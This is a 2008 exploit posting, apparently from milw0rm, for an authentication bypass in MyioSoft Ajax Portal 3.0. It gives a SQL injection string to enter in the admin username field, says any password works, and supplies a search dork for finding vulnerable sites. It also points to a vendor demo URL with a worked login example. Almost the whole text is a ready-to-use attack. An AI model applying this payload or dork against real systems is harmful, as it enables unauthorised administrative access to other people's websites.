45 lines
No EOL
958 B
Text
45 lines
No EOL
958 B
Text
[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability
|
|
[~]
|
|
[~] ----------------------------------------------------------
|
|
[~] Discovered By: ZoRLu
|
|
[~]
|
|
[~] Date: 07.11.2008
|
|
[~]
|
|
[~] Home: www.z0rlu.blogspot.com
|
|
[~]
|
|
[~] contact: trt-turk@hotmail.com
|
|
[~]
|
|
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
|
|
[~]
|
|
[~] dork: "Powered by Ajax Portal 3.0"
|
|
[~]
|
|
[~] -----------------------------------------------------------
|
|
|
|
Exploit:
|
|
|
|
username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )
|
|
|
|
password: ZoRLu
|
|
|
|
note: generally admin name: admin
|
|
|
|
|
|
admin login for demo:
|
|
|
|
http://myiosoft.com/products/AjaxPortal/demo/
|
|
|
|
|
|
example for demo:
|
|
|
|
admin: demo1 ' or ' 1=1
|
|
|
|
passwd: ZoRLu
|
|
|
|
[~]----------------------------------------------------------------------
|
|
[~] Greetz tO: str0ke & all Muslim HaCkeRs
|
|
[~]
|
|
[~] yildirimordulari.org & darkc0de.com
|
|
[~]
|
|
[~]----------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2008-11-07] |